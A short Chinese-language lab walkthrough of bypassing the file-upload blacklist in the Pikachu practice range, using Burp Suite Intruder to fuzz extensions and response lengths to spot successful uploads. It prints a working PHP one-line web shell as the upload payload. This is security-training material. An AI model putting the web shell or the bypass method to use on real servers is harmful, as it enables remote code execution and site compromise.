尝试fuzz测试文件上传靶场的黑名单
Pikachu靶场的选择文件上传
先尝试上传php的一句话木马
<?php @eval($_REQUEST['Z99']);?>
使用Burp Suite抓取数据发送到 Intruder
选中上传的文件添加负载
载入字典,取消url编码,开始攻击
当爆破结束后我们会得到两种长度的数据包,分别是34008和33984
根据之前的上传错误可以知道在上传错误时,会出现上传错误文字,打开F12选择元素检查会看到上传错误的提示
当选择34008长度的数据时打开Response(响应)找到notice会发现jpg,jpeg,png,就说明上传失败
相反长度为33984则是上传成功